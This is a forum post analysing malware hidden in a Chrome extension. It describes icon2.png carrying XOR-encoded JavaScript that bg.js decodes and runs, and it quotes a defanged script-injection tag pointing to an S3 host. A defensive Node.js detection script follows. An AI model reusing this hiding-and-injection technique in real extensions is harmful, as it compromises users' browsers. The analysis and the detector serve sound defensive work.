So I wrote this thing. How do I get famous? Link: https://gist.github.com/jimbo1qaz/bc73a2...9f089dd79c
"Give Me CRX" (https://chrome.google.com/webstore/detai...ci/reviews) contains a virus hidden in the source code.
Reviewer "Adam Carbonell" first discovered the existence of the malware. He mentioned that icon2.png contains malicious code.
bg.js (last modified 11/11/2016) extracts the code by reading icon2.png (last modified 11/10/2016) as text, extracting data between init> and <end strings (I assume a PNG comment), and xor-ing it with char ^ 77.
The resulting text is then run as JavaScript. I think around 24 hours after extension installation, every tab will have <script src='hXXp//s3.eu-central-1.amazonaws.com/forton/give_me_crx.js'> injected whenever "chrome.tabs.onUpdated" fires.
This link appears to return an "Access Denied" XML file right now. Was the exploit taken down? Is it not up yet? Did they just infect the extension, and are waiting for a critical mass of users before loading the exploit?
* The exploit was discovered around 10/28/2016. Today is 10/30/2016. The last modified dates point to 11/10/2016, which is in the future.
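
A defender-side check for the scheme described in the post, added here as an example and not taken from the post or the linked gist: it scans a file's raw bytes for the init> and <end markers, XORs what lies between with 77, and reports how text-like the result is without ever running it. The function names and the sample file are constructed for illustration.

```javascript
// Added example: triage a file for the hiding scheme described in the post.
const XOR_KEY = 77;                              // key stated in the post
const START = Buffer.from('init>', 'latin1');    // markers stated in the post
const END = Buffer.from('<end', 'latin1');
const PNG_SIG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);

// XOR is its own inverse, so this both encodes and decodes.
function xor77(bytes) {
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ XOR_KEY;
  return out;
}

// Share of bytes that are printable ASCII or whitespace (1 = all text).
function printableRatio(bytes) {
  if (bytes.length === 0) return 0;
  let n = 0;
  for (const b of bytes) if ((b >= 0x20 && b <= 0x7e) || b === 9 || b === 10 || b === 13) n++;
  return n / bytes.length;
}

// Work on raw bytes, not a text decode, so no byte is lost to charset conversion.
function triage(buf) {
  const hits = [];
  let pos = 0;
  for (;;) {
    const s = buf.indexOf(START, pos);
    if (s === -1) break;
    const bodyStart = s + START.length;
    const e = buf.indexOf(END, bodyStart);
    if (e === -1) break;                         // unterminated marker
    const decoded = xor77(buf.subarray(bodyStart, e));
    hits.push({ offset: s, length: e - bodyStart,
                printable: printableRatio(decoded), text: decoded.toString('latin1') });
    pos = e + END.length;
  }
  return { isPng: buf.subarray(0, 8).equals(PNG_SIG), hits };
}

// Constructed sample: PNG signature, filler, and a harmless string hidden the same way.
function buildSample(plain) {
  return Buffer.concat([PNG_SIG, Buffer.from('constructed-filler'), START,
                        xor77(Buffer.from(plain, 'latin1')), END, Buffer.from('tail')]);
}

const report = triage(buildSample("console.log('constructed sample');"));
console.log(report.isPng, report.hits.map(h => [h.offset, h.printable, h.text]));
```

A hit with a printable ratio near 1 inside an image file is worth reading by hand; an ordinary PNG has no reason to carry a region that decodes to script text.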